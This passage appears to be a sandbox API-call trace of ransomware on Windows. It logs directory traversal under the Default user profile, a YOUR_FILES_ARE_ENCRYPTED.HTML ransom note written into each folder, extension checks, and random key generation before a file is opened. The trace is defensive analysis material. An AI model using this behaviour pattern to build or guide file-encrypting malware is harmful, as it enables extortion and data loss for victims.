cAlternateFileName="")) returned 1 [0170.990] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.DTD", cAlternateFileName="")) returned 1 [0170.990] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0170.990] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0170.991] lstrlenW (lpString=".DTD") returned 4 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0170.991] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 1 [0170.991] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0170.991] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0170.991] lstrlenW (lpString=".XML") returned 4 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0170.991] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 0 [0170.991] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.991] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0170.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0170.992] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.995] CloseHandle (hObject=0x58c) returned 1 [0170.995] GetProcessHeap () returned 0x270000 [0170.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.995] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 0 [0170.995] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.996] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0170.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.996] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.999] CloseHandle (hObject=0x5fc) returned 1 [0170.999] GetProcessHeap () returned 0x270000 [0171.000] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.000] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0171.000] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 60 [0171.000] GetProcessHeap () returned 0x270000 [0171.000] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.000] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0171.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0171.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.001] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.001] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0171.001] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 68 [0171.001] GetProcessHeap () returned 0x270000 [0171.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.001] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0171.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0171.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.001] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.001] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.001] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.002] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0171.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.002] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.005] CloseHandle (hObject=0x58c) returned 1 [0171.005] GetProcessHeap () returned 0x270000 [0171.006] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.006] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0171.006] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0171.006] lstrcmpW (lpString1="Settings.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.006] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0171.006] lstrlenW (lpString=".ini") returned 4 [0171.006] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0171.006] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 0 [0171.006] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.006] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0171.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.007] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.010] CloseHandle (hObject=0x5fc) returned 1 [0171.010] GetProcessHeap () returned 0x270000 [0171.011] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.011] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0171.011] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.011] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0171.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.011] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.014] CloseHandle (hObject=0x600) returned 1 [0171.014] GetProcessHeap () returned 0x270000 [0171.015] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.016] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd22ac5d0, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0171.016] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned 39 [0171.016] GetProcessHeap () returned 0x270000 [0171.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.016] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" [0171.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*" [0171.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd22ac5d0, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0171.017] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd22ac5d0, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0171.017] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x921a91fa, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0171.017] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0171.017] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.017] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0171.017] lstrlenW (lpString=".txt") returned 4 [0171.017] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0171.017] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0171.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0171.018] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=0) returned 1 [0171.018] CloseHandle (hObject=0x5fc) returned 1 [0171.018] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x921a91fa, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 0 [0171.018] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.018] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0171.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.019] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.021] CloseHandle (hObject=0x600) returned 1 [0171.022] GetProcessHeap () returned 0x270000 [0171.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.023] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0171.023] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned 59 [0171.023] GetProcessHeap () returned 0x270000 [0171.023] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.023] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" [0171.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*" [0171.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x921a91fa, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="\x08ݩ")) returned 0xffffffff [0171.024] GetProcessHeap () returned 0x270000 [0171.025] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.025] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temporary Internet Files", 